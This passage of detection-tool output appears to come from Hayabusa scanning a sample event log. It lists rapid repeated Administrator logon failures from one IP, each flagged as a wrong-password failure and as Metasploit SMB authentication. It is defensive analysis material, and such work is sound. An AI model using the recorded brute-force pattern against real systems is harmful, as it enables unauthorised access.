SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 
+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: 
